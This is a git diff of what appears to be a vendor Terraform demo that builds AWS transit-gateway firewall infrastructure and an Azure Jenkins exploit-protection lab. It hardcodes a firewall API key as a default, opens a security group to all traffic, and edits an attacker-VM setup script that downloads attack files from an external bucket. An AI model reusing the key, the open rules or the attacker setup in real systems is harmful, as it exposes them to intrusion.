+        "logs:CreateLogGroup",
+        "logs:CreateLogStream",
+        "logs:DescribeLogGroups",
+        "logs:DescribeLogStreams",
+        "logs:GetLogEvents",
+        "logs:PutLogEvents"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    },
+    {
+      "Action": [
+        "ec2:DescribeNetworkInterfaces", 
+        "ec2:CreateNetworkInterface",
+        "ec2:DeleteNetworkInterface",
+        "ec2:DescribeRouteTables",
+        "ec2:DescribeSubnets",
+        "ec2:DeleteRoute",
+        "ec2:CreateRoute",
+        "ec2:DescribeInstances"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    }
+  ]
+}
\ No newline at end of file
diff --git a/aws/transitgateway-demo-v2/iam/variables.tf b/aws/transitgateway-demo-v2/iam/variables.tf
new file mode 100644
index 00000000..c98fcf54
--- /dev/null
+++ b/aws/transitgateway-demo-v2/iam/variables.tf
@@ -0,0 +1,21 @@
+variable "name" {
+  description = "The name of the policy"
+  default     = ""
+}
+
+variable "path" {
+  description = "The path of the policy in IAM"
+
+  default     = "/"
+}
+
+variable "description" {
+  description = "The description of the policy"
+
+  default     = "IAM Policy"
+}
+
+variable "policy" {
+  description = "The path of the policy in IAM (tpl file)"
+  default     = ""
+}
diff --git a/aws/transitgateway-demo-v2/lambda.tf b/aws/transitgateway-demo-v2/lambda.tf
new file mode 100644
index 00000000..655d4f80
--- /dev/null
+++ b/aws/transitgateway-demo-v2/lambda.tf
@@ -0,0 +1,75 @@
+
+resource "aws_iam_role_policy" "lambda_role_policy" {
+  name        = "lambda_role_policy"
+  role = "${aws_iam_role.lambda_role.id}"
+
+  policy = "${file("./iam/lambda-policy.json")}"
+}
+resource "aws_iam_role" "lambda_role" {
+  name = "lambda_role"
+
+  assume_role_policy = "${file("./iam/lambda-assume-policy.json")}"
+}
+
+resource "aws_lambda_layer_version" "external-modules-lambda" {
+  filename   = "./lambda/layer.zip"
+  layer_name = "external-modules"
+
+  compatible_runtimes = ["python3.6"]
+}
+
+resource "aws_lambda_function" "TransitGatewayRouteMonitorLambda" {
+  filename      = "./lambda/lambda-combined.zip"
+  function_name = "TransitGatewayRouteMonitorLambda"
+  role          = "${aws_iam_role.lambda_role.arn}"
+  handler       = "TransitGatewayRouteMonitorLambda.lambda_handler"
+  layers        = ["${aws_lambda_layer_version.external-modules-lambda.arn}"]
+
+
+  # The filebase64sha256() function is available in Terraform 0.11.12 and later
+  # For Terraform 0.11.11 and earlier, use the base64sha256() function and the file() function:
+  # source_code_hash = "${base64sha256(file("lambda_function_payload.zip"))}"
+  source_code_hash = "${filebase64sha256("./lambda/lambda-combined.zip")}"
+
+  vpc_config {
+    subnet_ids = ["${aws_subnet.vpc_security_lambda_1.id}","${aws_subnet.vpc_security_lambda_2.id}"]
+    security_group_ids = ["${aws_security_group.data_nsg.id}"]
+  }
+  runtime = "python3.6"
+  timeout = 30
+
+  environment {
+    variables = {
+      preempt = "${var.preempt}"
+      VpcSummaryRoute = "${var.vpc_summary_route}"
+      fw2Trusteni = "${module.ngfw2.trust_eni_id}"
+      fw1Trusteni = "${module.ngfw1.trust_eni_id}"
+      fromTGWRouteTableId =  "${aws_route_table.vpc_security_tgw.id}"
+      fw1Trustip = "${var.fw_ip_subnet_private_1}"
+      fw2Trustip = "${var.fw_ip_subnet_private_2}"
+      apikey = "${var.apikey}"
+      splitroutes = "${var.split_routes}"
+      Region = "${var.aws_region}"
+    }
+  }
+}
+
+resource "aws_cloudwatch_event_rule" "every_minute" {
+    name = "every-one-minute"
+    description = "Fires every minute"
+    schedule_expression = "rate(1 minute)"
+}
+
+resource "aws_cloudwatch_event_target" "lambda_check_every_minute" {
+    rule = "${aws_cloudwatch_event_rule.every_minute.name}"
+    target_id = "TransitGatewayRouteMonitorLambda"
+    arn = "${aws_lambda_function.TransitGatewayRouteMonitorLambda.arn}"
+}
+
+resource "aws_lambda_permission" "allow_cloudwatch_to_call_TransitGatewayRouteMonitorLambda" {
+    statement_id = "AllowExecutionFromCloudWatch"
+    action = "lambda:InvokeFunction"
+    function_name = "${aws_lambda_function.TransitGatewayRouteMonitorLambda.function_name}"
+    principal = "events.amazonaws.com"
+    source_arn = "${aws_cloudwatch_event_rule.every_minute.arn}"
+}
\ No newline at end of file
diff --git a/aws/transitgateway-demo-v2/lambda/lambda-combined.zip b/aws/transitgateway-demo-v2/lambda/lambda-combined.zip
new file mode 100644
index 00000000..5619c43c
Binary files /dev/null and b/aws/transitgateway-demo-v2/lambda/lambda-combined.zip differ
diff --git a/aws/transitgateway-demo-v2/lambda/layer.zip b/aws/transitgateway-demo-v2/lambda/layer.zip
new file mode 100644
index 00000000..ab9a284e
Binary files /dev/null and b/aws/transitgateway-demo-v2/lambda/layer.zip differ
diff --git a/aws/transitgateway-demo-v2/modules/vm-series/main.tf b/aws/transitgateway-demo-v2/modules/vm-series/main.tf
new file mode 100644
index 00000000..96da9623
--- /dev/null
+++ b/aws/transitgateway-demo-v2/modules/vm-series/main.tf
@@ -0,0 +1,172 @@
+variable name {
+  description = "firewall instance name"
+}
+
+variable untrust_subnet_id {}
+variable untrust_security_group_id {}
+variable untrustfwip {}
+
+variable trust_subnet_id {}
+variable trust_security_group_id {}
+variable trustfwip {}
+
+variable management_subnet_id {}
+variable management_security_group_id {}
+
+variable bootstrap_profile {
+  default = ""
+}
+
+variable bootstrap_bucket {}
+
+variable tgw_id {}
+
+variable aws_region {}
+variable aws_key {}
+
+variable instance_type {}
+
+variable ngfw_license_type {}
+
+variable ngfw_version {
+  default = "8.1"
+}
+
+variable "license_type_map" {
+  type = "map"
+
+  default = {
+    "byol"  = "6njl1pau431dv1qxipg63mvah"
+    "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km"
+    "payg2" = "806j2of0qy5osgjjixq9gqc6g"
+  }
+}
+
+data "aws_ami" "panw_ngfw" {
+  most_recent = true
+  owners = ["aws-marketplace"]
+  filter {
+    name   = "owner-alias"
+    values = ["aws-marketplace"]
+  }
+
+  filter {
+    name   = "product-code"
+    values = ["${var.license_type_map[var.ngfw_license_type]}"]
+  }
+
+  filter {
+    name   = "name"
+    values = ["PA-VM-AWS-${var.ngfw_version}*"]
+  }
+}
+
+data "aws_region" "current" {
+  name = "${var.aws_region}"
+}
+
+resource "aws_network_interface" "eni-management" {
+  description       = "Firewall ${var.name} management"
+  subnet_id         = "${var.management_subnet_id}"
+  security_groups   = ["${var.management_security_group_id}"]
+  source_dest_check = true
+
+  tags {
+    Name = "eni_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-trust" {
+  description       = "Firewall ${var.name} trust"
+  subnet_id         = "${var.trust_subnet_id}"
+  private_ips       = ["${var.trustfwip}"]
+  security_groups   = ["${var.trust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_trust"
+  }
+}
+
+output "eni-trust" {
+  value = "${aws_network_interface.eni-trust.id}"
+}
+
+
+resource "aws_eip" "eip-management" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-management.id}"
+
+  tags {
+    Name = "eip_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-untrust" {
+  description       = "Firewall ${var.name} untrust"
+  subnet_id         = "${var.untrust_subnet_id}"
+  private_ips       = ["${var.untrustfwip}"]
+  security_groups   = ["${var.untrust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_untrust"
+  }
+}
+
+
+resource "aws_eip" "eip-untrust" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-untrust.id}"
+
+  tags {
+    Name = "eip_${var.name}_untrust"
+  }
+}
+
+resource "aws_instance" "instance-ngfw" {
+  disable_api_termination              = false
+  instance_initiated_shutdown_behavior = "stop"
+  iam_instance_profile                 = "${var.bootstrap_profile}"
+  user_data                            = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_bucket)))}"
+
+  ebs_optimized = true
+  ami           = "${data.aws_ami.panw_ngfw.image_id}"
+  instance_type = "${var.instance_type}"
+  key_name      = "${var.aws_key}"
+
+  monitoring = false
+  
+  root_block_device {
+    delete_on_termination = "true"
+  }
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.eni-management.id}"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.eni-untrust.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.eni-trust.id}"
+  }
+
+  tags {
+    Name = "${var.name}"
+  }
+}
+
+output "eip_untrust" {
+  value = "${aws_eip.eip-untrust.public_ip}"
+}
+
+output "eip_mgmt" {
+  value = "${aws_eip.eip-management.public_ip}"
+}
+output "trust_eni_id" {
+  value ="${aws_network_interface.eni-trust.id}"
+}
\ No newline at end of file
diff --git a/aws/transitgateway-demo-v2/modules/vm-spoke/main.tf b/aws/transitgateway-demo-v2/modules/vm-spoke/main.tf
new file mode 100644
index 00000000..2dc08e30
--- /dev/null
+++ b/aws/transitgateway-demo-v2/modules/vm-spoke/main.tf
@@ -0,0 +1,177 @@
+variable vpc_spoke_cidr {}
+variable vpc_spoke_subnet_cidr {}
+variable vpc_spoke_subnet2_cidr {}
+variable aws_tgw_id {}
+variable aws_tgw_security_rtb_id {}
+variable aws_tgw_spoke_rtb_id {}
+variable pemkey {}
+variable serverip {}
+variable server2ip {}
+variable servername {}
+variable server2name {}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC
+#************************************************************************************
+resource "aws_vpc" "vpc_spoke" {
+  cidr_block = "${var.vpc_spoke_cidr}"
+
+  tags {
+    Name = "vpc_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC SUBNETS
+#************************************************************************************
+data "aws_availability_zones" "available" {}
+
+resource "aws_subnet" "primary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}"
+  }
+}
+
+resource "aws_subnet" "secondary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet2_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC SUBNET ROUTE TABLE
+#************************************************************************************
+resource "aws_route" "vpc_spoke_route_1" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+
+#************************************************************************************
+# CREATE NSGs & NSG RULES FOR SPOKE-VM ENIs
+#************************************************************************************
+resource "aws_security_group" "server_sg" {
+  name        = "server_sg"
+  description = "Allow select inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_spoke.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+
+#************************************************************************************
+# CREATE TGW ATTACHMENT FOR SPOKE-VPC
+#************************************************************************************
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" {
+  vpc_id                                          = "${aws_vpc.vpc_spoke.id}"
+  subnet_ids                                      = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"]
+  transit_gateway_id                              = "${var.aws_tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# ASSOCIATE TGW ROUTE TABLE W/ SPOKE ATTACHMENT (route table created in create_tgw.tf)
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}"
+}
+
+
+#************************************************************************************
+# CREATE SPOKE VMs
+#************************************************************************************
+data "aws_ami" "ubuntu" {
+  most_recent = true
+
+  filter {
+    name   = "name"
+    values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-amd64-server-*"]
+  }
+
+  filter {
+    name   = "virtualization-type"
+    values = ["hvm"]
+  }
+
+  owners = ["099720109477"] # Canonical
+}
+
+resource "aws_instance" "web" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.primary.id}"
+  private_ip      = "${var.serverip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.servername}"
+  }
+}
+
+resource "aws_instance" "web2" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.secondary.id}"
+  private_ip      = "${var.server2ip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.server2name}"
+  }
+}
+
+
+#************************************************************************************
+# OUTPUT SPOKE-VPC IDs
+#************************************************************************************
+output "vpc_id" {
+  value = "${aws_vpc.vpc_spoke.id}"
+}
+
+output "subnet_id" {
+  value = "${aws_subnet.primary.id}"
+}
diff --git a/aws/transitgateway-demo-v2/providers.tf b/aws/transitgateway-demo-v2/providers.tf
new file mode 100644
index 00000000..89c5aab2
--- /dev/null
+++ b/aws/transitgateway-demo-v2/providers.tf
@@ -0,0 +1,4 @@
+provider "aws" {
+  version    = ">= 1.0.0"
+  region     = "${var.aws_region}"
+}
diff --git a/aws/transitgateway-demo-v2/variables.tf b/aws/transitgateway-demo-v2/variables.tf
new file mode 100644
index 00000000..10aced69
--- /dev/null
+++ b/aws/transitgateway-demo-v2/variables.tf
@@ -0,0 +1,197 @@
+#************************************************************************************
+# HA script parameters
+#************************************************************************************
+variable apikey {
+  description = "Firewall API Key"
+  default     = "LUFRPT13YW8wYVhzQXNhMnFIM1J4cWNYMWROOVBMUGc9Y21mS2JKSlVVdC84ZVpJdE50V000VTgra2xURmxhNFRXNkJud0h3Nko4RT0="
+}
+variable preempt {
+  description = "Firewall API Key"
+  default     = "yes"
+}
+variable split_routes {
+  description = "Solit routing across both firewalls"
+  default     = "yes"
+}
+variable vpc_summary_route {
+  description = "VPC summary route"
+  default     = "10.0.0.0/8"
+}
+
+#************************************************************************************
+# SET REGION AND SSH KEY FOR EC2 INSTANCES
+#************************************************************************************
+variable aws_region {
+  description = "AWS Region for deployment"
+  default     = "eu-west-1"
+}
+variable aws_key {
+  description = "Enter your AWS EC2 key pair"
+  # default     = "my_aws_ec2_key_pair"
+}
+variable management_cidr {
+  description = "Source IP applied to management NSG"
+  # default     = "0.0.0.0/0"
+}
+
+variable ngfw_license_type {
+  description = "Select VM-Series license type (byol, payg1, payg2)"
+  # default = "byol"
+  # default = "payg1"
+  # default = "payg2"
+}
+
+variable instance_type {
+  description = "Select VM-Series Size"
+  default = "m4.2xlarge"
+}
+
+#************************************************************************************
+# S3 STORAGE BUCKETS FOR FW BOOTSTRAPPING (DO NOT CREATE BEFORE DEPLOYMENT)
+#************************************************************************************
+variable bootstrap_s3bucket1_create {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-fw1-bootstrap" // 30-CHARATER RANDOM STRING IS ADDED TO THIS BUCKET NAME
+}
+
+variable bootstrap_s3bucket2_create {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-fw2-bootstrap" // 30-CHARACTER RANDOM STRING IS ADDED TO THIS BUCKET NAME
+}
+
+#************************************************************************************
+# SECURITY VPC CIDRS
+#************************************************************************************
+variable vpc_security_cidr {
+  description = "Security VPC CIDR"
+  default     = "192.168.0.0/16"
+}
+
+variable vpc_security_subnet_mgmt_1 {
+  description = "Mgmt Subnet CIDR-AZ1"
+  default     = "192.168.100.0/24"
+}
+variable vpc_security_subnet_mgmt_2 {
+  description = "Mgmt Subnet CIDR-AZ2"
+  default     = "192.168.101.0/24"
+}
+variable vpc_security_subnet_public_1 {
+  description = "Public Subnet CIDR-AZ1"
+  default     = "192.168.10.0/24"
+}
+variable vpc_security_subnet_public_2 {
+  description = "Public Subnet CIDR-AZ2"
+  default     = "192.168.11.0/24"
+}
+variable vpc_security_subnet_private_1 {
+  description = "Trust Subnet CIDR-AZ1"
+  default     = "192.168.20.0/24"
+}
+variable vpc_security_subnet_private_2 {
+  description = "Trust Subnet CIDR-AZ2"
+  default     = "192.168.21.0/24"
+}
+variable vpc_security_subnet_tgw_1 {
+  description = "TGW Subnet CIDR-AZ1"
+  default     = "192.168.30.0/24"
+}
+variable vpc_security_subnet_tgw_2 {
+  description = "TGW Subnet CIDR-AZ2"
+  default     = "192.168.31.0/24"
+}
+variable vpc_security_subnet_lambda_1 {
+  description = "Lambda Subnet AZ1"
+  default     = "192.168.110.0/24"
+}
+variable vpc_security_subnet_lambda_2 {
+  description = "Lambda Subnet AZ2"
+  default     = "192.168.112.0/24"
+}
+
+#************************************************************************************
+# FW ENI IP ADDRESSES
+#************************************************************************************
+variable fw_ip_subnet_public_1 {
+  description = "FW1 Public Subnet IP Address-AZ1"
+  default     = "192.168.10.4"
+}
+variable fw_ip_subnet_public_2 {
+  description = "FW2 Public Subnet IP Address-AZ2"
+  default     = "192.168.11.4"
+}
+variable fw_ip_subnet_private_1 {
+  description = "FW1 Private Subnet IP Address-AZ1"
+  default     = "192.168.20.4"
+}
+variable fw_ip_subnet_private_2 {
+  description = "FW2 Private Subnet IP Address-AZ2"
+  default     = "192.168.21.4"
+}
+
+
+#************************************************************************************
+# SPOKE-1 VPC CIDRS
+#************************************************************************************
+variable spoke1_cidr {
+  description = "CIDR Address for Spoke1 VPC"
+  default     = "10.1.0.0/16"
+}
+
+variable spoke1_subnet {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.0.0/24"
+}
+
+variable spoke1_subnet2 {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.1.0/24"
+}
+
+
+#************************************************************************************
+# SPOKE-2 VPC CIDRS
+#************************************************************************************
+variable spoke2_cidr {
+  description = "CIDR Address for Spoke2 VPC"
+  default     = "10.2.0.0/16"
+}
+
+variable spoke2_subnet {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.0.0/24"
+}
+
+variable spoke2_subnet2 {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.1.0/24"
+}
+
+
+#************************************************************************************
+# SPOKE-1 VM IP ADDRESSES
+#************************************************************************************
+variable spoke1_server {
+  description = "Server Address for Spoke1 Server"
+  default     = "10.1.0.4"
+}
+variable spoke1_server2 {
+  description = "Server Address for Spoke1 Server2"
+  default     = "10.1.1.4"
+}
+
+#************************************************************************************
+# SPOKE-2 VM IP ADDRESSES
+#************************************************************************************
+variable spoke2_server {
+  description = "Server Address for Spoke2 Server"
+  default     = "10.2.0.4"
+}
+variable spoke2_server2 {
+  description = "Server Address for Spoke2 Server2"
+  default     = "10.2.1.4"
+}
+variable all_spoke_cidr {
+  description = "CIDR to cover Spoke1 and Spoke2-Used in FROM-TGW AWS Route Table"
+  default     = "10.0.0.0/8"
+}
+
diff --git a/azure/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
index a0a5c0d6..4e97d861 100644
--- a/azure/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
+++ b/azure/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
@@ -4,9 +4,8 @@ label: Azure Jenkins Security Framework Step 1 Infrastructure Deployment Build
 
 description: >
   This skillet deploys the Security Framework Azure Jenkins Exploit Protection environment.  The template deploy the Following:
-  Azure VPC's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Security Groups.
+  Azure VNETS's, Route Tables, Subnets, Availability Zones, Load Balancers and Native Security tools WAF and Network Security Groups.
   The Template will also deploy Palo Alto Networks Firewall with security posture.
-
 # type of skillet (panos or panorama or template or terraform)
 type: python3
 
@@ -17,14 +16,14 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: Azure Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
 variables:
   - name: username
     description: FW Username
-    default: admin
+    default: panadmin
     type_hint: text
   - name: password
     description: FW Password
@@ -34,7 +33,77 @@ variables:
     description: Azure Resource Group
     default: cloud-security-framework-changeme
     type_hint: text
-
+  - name: azure_region
+    description: Azure Region
+    default: centralus
+    type_hint: dropdown
+    dd_list:
+     - key: "West US"
+       value: "westus"
+     - key: "West US 2"
+       value: "westus2"
+     - key: "West Central US"
+       value: "westcentralus"
+     - key: "East US"
+       value: "eastus"
+     - key: "East US 2"
+       value: "eastus2"
+     - key: "Central US"
+       value: "centralus"
+     - key: "North Central US"
+       value: "northcentralus"
+     - key: "South Central US"
+       value: "southcentralus"
+     - key: "Canada Central"
+       value: "canadacentral"
+     - key: "Canada East"
+       value: "canadaeast"
+     - key: "UK West"
+       value: "ukwest"
+     - key: "UK South"
+       value: "uksouth"
+     - key: "North Europe"
+       value: "northeurope"
+     - key: "West Europe"
+       value: "westeurope"
+     - key: "Australia East"
+       value: "australiaeast"
+     - key: "Australia Southeast"
+       value: "australiasoutheast"
+     - key: "Australia Central"
+       value: "australiacentral"
+     - key: "Australia Central 2"
+       value: "australiacentral2"
+     - key: "East Asia"
+       value: "eastasia"
+     - key: "South East Asia"
+       value: "southeastasia"
+     - key: "Korea Central"
+       value: "koreacentral"
+     - key: "Korea South"
+       value: "koreasouth"
+     - key: "Japan West"
+       value: "japanwest"
+     - key: "Japan East"
+       value: "japaneast"
+     - key: "South India"
+       value: "southindia"
+     - key: "Central India"
+       value: "centralindia"
+     - key: "West India"
+       value: "westindia"
+     - key: "Brazil South"
+       value: "brazilsouth"
+     - key: "France Central"
+       value: "francecentral"
+     - key: "France South"
+       value: "francesouth"
+ # - name: azure_region
+ #   description: Azure Region
+ #   default: centralus
+ #   type_hint: text
+    
+    
 # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
 # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
 # to load and parse. Jinja2 style variables will be variable interpolated using the values of the 'variables' defined
@@ -42,4 +111,3 @@ variables:
 snippets:
   - name: script
     file: ../../deploy.py
-
diff --git a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
index 597951fa..e96eb3c6 100644
--- a/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
+++ b/azure/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
@@ -15,7 +15,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: Azure Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
index 96e2aa59..dd64f7ff 100644
--- a/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
+++ b/azure/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
@@ -17,7 +17,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: Azure Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
index e6cce0e6..8e3c95eb 100644
--- a/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
+++ b/azure/Jenkins_proj-master/.pan-cnc/login/.meta-cnc.yaml
@@ -1,5 +1,5 @@
 name: azure_login
-label: Azure Login
+label: Azure Login (Pre-Deployment Step)
 
 description: |
   This skillet will log into Azure. You will be prompted to follow a link and enter a device-code in your browser.
@@ -14,7 +14,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: Azure Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
@@ -30,4 +30,4 @@ variables:
 # in the 'variables' section.
 snippets:
   - name: script
-    file: ../../azure_login.py
\ No newline at end of file
+    file: ../../azure_login.py
diff --git a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
index 189ed790..26e7925e 100644
--- a/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
+++ b/azure/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -4,7 +4,6 @@ label: Azure Jenkins Security Framework Step 3 Send Command
 
 description: >
   This Skillet will allow you to interact and send commands to the exploited Jenkins system.
-
 # type of skillet (panos or panorama or template or terraform)
 type: python3
 
@@ -15,7 +14,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: Azure Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars
index 18e2a06e..9f03abf8 100644
--- a/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars
+++ b/azure/Jenkins_proj-master/WebInBootstrap/terraform.tfvars
@@ -1,3 +1,3 @@
 RG_Name = "<Jenkins RG Name>"
 
-Azure_Region = "central us"
+Azure_Region = "<Azure Region>"
diff --git a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
index adf9834a..e528f907 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
+++ b/azure/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
@@ -741,13 +741,6 @@
                 </hourly>
               </recurring>
             </anti-virus>
-            <wildfire>
-              <recurring>
-                <every-min>
-                  <action>download-and-install</action>
-                </every-min>
-              </recurring>
-            </wildfire>
           </update-schedule>
         </system>
         <setting>
diff --git a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf
index 810c5293..14f0338f 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf
+++ b/azure/Jenkins_proj-master/WebInDeploy/loadbalancers.tf
@@ -53,6 +53,7 @@ resource "azurerm_application_gateway" "appgw1" {
     backend_address_pool_name  = "webservers"
     backend_http_settings_name = "http"
   }
+  depends_on = ["data.azurerm_resource_group.resourcegroup"]
 }
 
 #### AppGW2 ####
@@ -108,6 +109,7 @@ resource "azurerm_application_gateway" "appgw2" {
     backend_address_pool_name  = "firewalls"
     backend_http_settings_name = "http"
   }
+  depends_on = ["data.azurerm_resource_group.resourcegroup"]
 }
 
 #### INTERNAL APP FACING LOAD BALANCER ####
@@ -150,4 +152,4 @@ resource "azurerm_lb_rule" "webservers" {
   frontend_ip_configuration_name = "weblbip"
   backend_address_pool_id        = "${azurerm_lb_backend_address_pool.webservers.id}"
   probe_id                       = "${azurerm_lb_probe.webservers.id}"
-}
\ No newline at end of file
+}
diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh
index 3bf0b075..4cabd5ed 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh
+++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker1.sh
@@ -4,10 +4,10 @@ apt-get update
 apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 pip3 install docker-compose
 cd /var/tmp
-wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/Dockerfile
-wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/.temp/docker-compose.yml
-wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/run.sh
